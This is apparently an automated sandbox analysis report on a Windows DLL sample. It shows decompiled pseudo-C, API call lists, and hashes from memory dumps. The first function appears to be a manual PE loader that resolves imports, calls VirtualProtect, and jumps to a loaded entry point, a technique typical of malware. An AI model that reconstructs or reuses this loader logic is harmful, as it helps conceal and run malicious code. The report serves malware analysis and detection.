              				void* _v12;
              				void* __edi;
              				void* _t18;
              				long _t24;
              				long _t26;
              				long _t29;
              				intOrPtr _t40;
              				void* _t41;
              				intOrPtr* _t42;
              				void* _t44;
              
              				_t41 = __eax;
              				_t16 =  *0x6e1c41cc;
              				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4);
              				_t18 = E6E1C1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
              				if(_t18 != 0) {
              					_t29 = 8;
              					goto L8;
              				} else {
              					_t40 = _v8;
              					_t29 = E6E1C1A5A(_t33, _t40, _t41);
              					if(_t29 == 0) {
              						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
              						_t24 = E6E1C1F7C(_t40, _t44); // executed
              						_t29 = _t24;
              						if(_t29 == 0) {
              							_t26 = E6E1C126D(_t44, _t40); // executed
              							_t29 = _t26;
              							if(_t29 == 0) {
              								_push(_t26);
              								_push(1);
              								_push(_t40);
              								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
              									_t29 = GetLastError();
              								}
              							}
              						}
              					}
              					_t42 = _v12;
              					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
              					E6E1C142F(_t42);
              					L8:
              					return _t29;
              				}
              			}

              APIs
                • Part of subcall function 6E1C1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1A5A: memcpy.NTDLL(00000000,00000002,6E1C148E,?,?,?,?,?,6E1C148E,?,?,?,?,?,?,00000002), ref: 6E1C1A87
                • Part of subcall function 6E1C1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E1C1ABA
                • Part of subcall function 6E1C1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1C1FB4
                • Part of subcall function 6E1C126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1C12A6
                • Part of subcall function 6E1C126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1C131B
                • Part of subcall function 6E1C126D: GetLastError.KERNEL32 ref: 6E1C1321
              • GetLastError.KERNEL32(?,?), ref: 6E1C14C2
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
              • String ID:
              • API String ID: 2673762927-0
              • Opcode ID: 631c73b6a68c408efe95f21eb522350c53cbbaf012f7e67f99f16e556f4c87ff
              • Instruction ID: 5a7fad273fd0fee94db9a56d62665650435849fed935fb375d0785817b05509b
              • Opcode Fuzzy Hash: 631c73b6a68c408efe95f21eb522350c53cbbaf012f7e67f99f16e556f4c87ff
              • Instruction Fuzzy Hash: B1115B76340705ABD710DAE9CC80DDB77FCAF68A047104458E905D7240EBA8ED4A97A1
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              APIs
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C12
                • Part of subcall function 6E22FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E22FA8A
                • Part of subcall function 6E22FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E22FA9F
              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E223C24
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C44
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C86
              • __calloc_crt.LIBCMT ref: 6E223C59
                • Part of subcall function 6E223A00: __calloc_impl.LIBCMT ref: 6E223A0F
              • __calloc_crt.LIBCMT ref: 6E223C9B
              • _free.LIBCMT ref: 6E223CB3
              • _free.LIBCMT ref: 6E223CF3
              • __calloc_crt.LIBCMT ref: 6E223D1D
              • _free.LIBCMT ref: 6E223D43
              • __invoke_watson.LIBCMT ref: 6E223D93
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
              • String ID:
              • API String ID: 1731282729-0
              • Opcode ID: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction ID: 91a273b7995749c39333252be1b6a8c94678e58d70d3b27ba582f3c2f350ef32
              • Opcode Fuzzy Hash: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction Fuzzy Hash: FA515FB990421FAFEB649FA58D49BDA7B7EFF04314F1044B5E908A6241EF3289548B60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _wcscmp.LIBCMT ref: 6E22E86E
              • _wcscmp.LIBCMT ref: 6E22E87F
              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E22E89B
              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E22E8C5
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale_wcscmp
              • String ID:
              • API String ID: 1351282208-0
              • Opcode ID: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction ID: d72f3ebb0ab87946e1b9d78f32fac50a19ea9ced617190429f4e59992035ade0
              • Opcode Fuzzy Hash: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction Fuzzy Hash: F501843525851EAFFB429EE8C845ECA37DEAF05656B008435F944DA1A0E730D580E7D2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6E2235A7
              • _free.LIBCMT ref: 6E2235C0
                • Part of subcall function 6E223DA6: HeapFree.KERNEL32(00000000,00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DBA
                • Part of subcall function 6E223DA6: GetLastError.KERNEL32(00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DCC
              • _free.LIBCMT ref: 6E2235D3
              • _free.LIBCMT ref: 6E2235F1
              • _free.LIBCMT ref: 6E223603
              • _free.LIBCMT ref: 6E223614
              • _free.LIBCMT ref: 6E22361F
              • _free.LIBCMT ref: 6E223643
              • RtlEncodePointer.NTDLL(6E295980), ref: 6E22364A
              • _free.LIBCMT ref: 6E22365F
              • _free.LIBCMT ref: 6E223675
              • _free.LIBCMT ref: 6E22369D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
              • String ID: F)n
              • API String ID: 3064303923-455955172
              • Opcode ID: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction ID: f2092f26939f6fe976f8b0e4216b1d686dbad9eae048902615ada0eeb8d0289f
              • Opcode Fuzzy Hash: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction Fuzzy Hash: 4221A039A4692BCFFFA04FA6DD4C96977ABBB46736300153AE51897300C7384841CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
              • String ID:
              • API String ID: 1442030790-0
              • Opcode ID: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction ID: 58fce7c5e625cfd19c7794b453747821f3fc3bb7f5cd63cc94dbe1269efbc1a9
              • Opcode Fuzzy Hash: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction Fuzzy Hash: E521C27F52861AEFE7615FE5CC05E8A7BEBFF46754B204C39E44456260EB3384008690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
              • String ID:
              • API String ID: 3432600739-0
              • Opcode ID: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction ID: 4a74aaa7999ea2dfe95c970c909eeb090bc5f55156b2ac6bfb2ceaba66c413d7
              • Opcode Fuzzy Hash: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction Fuzzy Hash: 2D41EEBA81420EAFDB009FE59880BCD77EBBF04319F104839F91597180DB779686DB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • __init_pointers.LIBCMT ref: 6E22212F
                • Part of subcall function 6E2237EA: RtlEncodePointer.NTDLL(00000000), ref: 6E2237ED
                • Part of subcall function 6E2237EA: __initp_misc_winsig.LIBCMT ref: 6E223808
                • Part of subcall function 6E2237EA: GetModuleHandleW.KERNEL32(6E1C30D8,?,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225B99
              • __mtinitlocks.LIBCMT ref: 6E222134
              • __mtterm.LIBCMT ref: 6E22213D
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(?), ref: 6E228218
                • Part of subcall function 6E2221A5: _free.LIBCMT ref: 6E22821F
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(6E294D40), ref: 6E228241
              • __calloc_crt.LIBCMT ref: 6E222162
              • __initptd.LIBCMT ref: 6E222184
              • GetCurrentThreadId.KERNEL32 ref: 6E22218B
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 1551663144-0
              • Opcode ID: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction ID: d565c042dde21decc911553a71a6fc81b6dc8b151065f299e509da5fd8bd05a5
              • Opcode Fuzzy Hash: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction Fuzzy Hash: F0F0F67702D71B2FF664AAF46C05ACB2A8BAF02639B200A39F564DA0D1FF128041D160
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindFirstChangeNotificationA.KERNEL32 ref: 6E23EB7D
              • GetCurrentDirectoryA.KERNEL32(00000404,6E2A9BC0), ref: 6E23EBDF
              • GetEnvironmentVariableA.KERNEL32(6E1C8140,6E2AA1E8,00000404), ref: 6E23ECD9
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
              • String ID: 3$PR)n
              • API String ID: 2016254915-1293188012
              • Opcode ID: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction ID: f6d5d697a6d37fcb63d56ea0a24ecb194e354d0057a3c764feded77284319f67
              • Opcode Fuzzy Hash: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction Fuzzy Hash: D471AEB1B847168FDB04CFAAC89861977A3FB8631AF549A3ED81587344D3749808CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _wcsnlen
              • String ID: U
              • API String ID: 3628947076-3372436214
              • Opcode ID: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction ID: 706025769fbe77e4a28b6b92e08f17182ff787be2a26e52ff9da0bbcc658df2e
              • Opcode Fuzzy Hash: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction Fuzzy Hash: E6213BB362810DAFEB448AE9AC45FFA33AEDB45761F504535F908C7180FB73DA108690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _malloc.LIBCMT ref: 6E22F774
                • Part of subcall function 6E224E76: __FF_MSGBANNER.LIBCMT ref: 6E224E8D
                • Part of subcall function 6E224E76: __NMSG_WRITE.LIBCMT ref: 6E224E94
                • Part of subcall function 6E224E76: RtlAllocateHeap.NTDLL(6E2959B8,00000000,00000001), ref: 6E224EB9
              • _free.LIBCMT ref: 6E22F787
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction ID: 2a10e2b7a5c32affc8b1445ad24871128c017ce3979bc7d6f16a9dc870975e25
              • Opcode Fuzzy Hash: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction Fuzzy Hash: D011CA3691461F9FFF611FF89854A8B37DBAF05379F304936F908AA180EB74848086E4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 6E221FF5: __getptd_noexit.LIBCMT ref: 6E221FF6
                • Part of subcall function 6E221FF5: __amsg_exit.LIBCMT ref: 6E222003
              • __amsg_exit.LIBCMT ref: 6E22195F
              • __lock.LIBCMT ref: 6E22196F
              • _free.LIBCMT ref: 6E22199C
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __amsg_exit$__getptd_noexit__lock_free
              • String ID: F)n
              • API String ID: 3054295789-455955172
              • Opcode ID: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction ID: 28a04ea06208bf68ecd72fe695767930c2cb6358b5aa497ff02029938896fdf2
              • Opcode Fuzzy Hash: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction Fuzzy Hash: 2A11A535D01A6F9FCB509FEA8440F8DB3E67F05B21B150529D474A7280CB395986CFD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E23CB95
              • __isleadbyte_l.LIBCMT ref: 6E23CBC3
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CBF1
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CC27
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction ID: a1145c35da36b566790ba9e4a56cec1f720db70330db6cdb6ebd5ff284bac845
              • Opcode Fuzzy Hash: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction Fuzzy Hash: 7831057050427FAFDB118EB5C846BAA7BA7FF01721F254829E4618B190E731D450DFA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • ___BuildCatchObject.LIBCMT ref: 6E22633B
                • Part of subcall function 6E226A30: ___BuildCatchObjectHelper.LIBCMT ref: 6E226A62
                • Part of subcall function 6E226A30: ___AdjustPointer.LIBCMT ref: 6E226A79
              • _UnwindNestedFrames.LIBCMT ref: 6E226352
              • ___FrameUnwindToState.LIBCMT ref: 6E226364
              • CallCatchBlock.LIBCMT ref: 6E226388
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
              • String ID:
              • API String ID: 2901542994-0
              • Opcode ID: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction ID: ee0afe558ddf0337d7cfce0a731354002d2884e81c01789a62bf030c85e24bd3
              • Opcode Fuzzy Hash: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction Fuzzy Hash: B301173201014DEFCF025F95DC40EDA7BBAFF48B54F058424FA1866120C372E5619FA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction ID: 494249a2afee8a6f63858aff78b1f8147ea0c4a96904d87ad01eff588c94aa35
              • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction Fuzzy Hash: BF01333644828EBFCF125EC4CC11DEE3F27BB19355B458925FE28981A0C336D6B1AB81
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F10() {
              				void* _t1;
              				long _t3;
              				void* _t4;
              				long _t5;
              				void* _t6;
              				intOrPtr _t8;
              
              				_t8 =  *0x6e1c41b0;
              				_t1 = CreateEventA(0, 1, 0, 0);
              				 *0x6e1c41bc = _t1;
              				if(_t1 == 0) {
              					return GetLastError();
              				}
              				_t3 = GetVersion();
              				if(_t3 <= 5) {
              					_t4 = 0x32;
              					return _t4;
              				} else {
              					 *0x6e1c41ac = _t3;
              					_t5 = GetCurrentProcessId();
              					 *0x6e1c41a8 = _t5;
              					 *0x6e1c41b0 = _t8;
              					_t6 = OpenProcess(0x10047a, 0, _t5);
              					 *0x6e1c41a4 = _t6;
              					if(_t6 == 0) {
              						 *0x6e1c41a4 =  *0x6e1c41a4 | 0xffffffff;
              					}
              					return 0;
              				}
              			}

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
              • GetVersion.KERNEL32 ref: 6E1C1F2E
              • GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Process$CreateCurrentEventOpenVersion
              • String ID:
              • API String ID: 845504543-0
              • Opcode ID: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction ID: 51aa3f2096f753addaedce12120e78271127343c77df0434785102bce9e58d26
              • Opcode Fuzzy Hash: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction Fuzzy Hash: ADF01D72688A10AFEF509FA9A81E7893FB4B72BF11F108059F199C91C0D3786447BB45
              Uniqueness

              Uniqueness Score: -1.00%